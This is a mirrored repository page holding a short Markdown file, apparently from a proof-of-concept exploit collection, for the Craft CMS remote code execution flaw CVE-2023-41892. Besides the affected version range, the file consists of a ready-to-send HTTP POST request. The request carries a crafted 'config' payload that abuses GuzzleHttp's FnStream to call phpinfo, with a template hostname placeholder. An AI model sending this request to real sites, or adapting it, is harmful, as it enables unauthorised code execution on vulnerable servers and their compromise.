admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/Craft/Craft CMS远程代码执行漏洞CVE-2023-41892.md

15 lines
459 B
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
## Craft CMS远程代码执行漏洞CVE-2023-41892
## 影响版本
Craft CMS >= 4.0.0-RC1
Craft CMS <= 4.4.14
## exp
```
POST /index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream", "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}
```
Reference in New Issue Copy Permalink